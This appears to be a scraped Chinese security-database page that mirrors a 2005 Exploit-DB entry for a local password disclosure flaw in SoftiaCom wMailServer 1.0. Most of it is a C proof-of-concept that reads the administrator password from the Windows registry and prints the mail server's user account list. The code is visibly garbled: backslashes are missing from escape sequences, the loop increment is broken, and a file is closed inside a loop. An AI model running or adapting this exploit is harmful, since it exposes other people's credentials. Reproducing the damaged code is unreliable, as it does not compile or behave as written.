SoftiaCom wMailServer 1.0 – Local Information Disclosure

SoftiaCom wMailServer 1.0 – Local Information Disclosure

漏洞ID 1055241 漏洞类型
发布时间 2005-07-09 更新时间 2005-07-09
图片[1]-SoftiaCom wMailServer 1.0 – Local Information Disclosure-安全小百科CVE编号 N/A
图片[2]-SoftiaCom wMailServer 1.0 – Local Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25961
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14212/info

SoftiaCom WMailserver is prone to a local information disclosure vulnerability. The application stores passwords in the windows registry.

A local attacker may exploit this issue to disclose potentially sensitive information. 

/***********************************
# Vulnerability: Local Password Disclosure
# Discovered on: July 9, 2005
# Discovered & Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
**************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

LONG lRet;
HKEY hKey;
DWORD dwBuf=BUF;
char pwd[BUF], fichier[BUF], donnees[BUF];

int main()
{

if( RegOpenKeyEx( HKEY_CURRENT_CONFIG,"Software\Darsite\MAILSRV\Admin",0,KEY_QUERY_VALUE,&hKey) !=ERROR_SUCCESS )
{
fprintf( stdout, "Aucune clef wMailServer en vue !n" );
return -1;
}

if( RegQueryValueEx( hKey,"",NULL,NULL,(BYTE *)&pwd,&dwBuf) != ERROR_SUCCESS )
lstrcpy( pwd,"Viden" );

fprintf( stdout, "nn-------------------------------------------n" );
fprintf( stdout, "SoftiaCom Software - wMailServer v1.0n" );
fprintf( stdout, "Local Password Disclosure Vulnerabilitynn" );
fprintf( stdout, "Discovered & coded by fRoGGz - SecuBox Labsnn" );
fprintf( stdout, "-------------------------------------------nn" );
fprintf( stdout, "Mot de passe Administrateurt: %sn", pwd );

int i;
FILE *fp;
char ch[100];

strcpy(fichier,"\WINNT\MAILSRV\userlist");

if((fp=fopen(fichier,"rb")) == NULL)
{
printf("Pas cool !n");
return -1;
}

for(i=0;i<99;i )
{
ch[i]=getc(fp);
strcpy(donnees,ch);
fclose(fp);
}

fprintf( stdout, "nListe des comptes utilisateursnn %sn", donnees );
return 0;
}

相关推荐: Solaris xlock Heap Overflow Vulnerability

Solaris xlock Heap Overflow Vulnerability 漏洞ID 1103013 漏洞类型 Boundary Condition Error 发布时间 2001-08-10 更新时间 2001-08-10 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享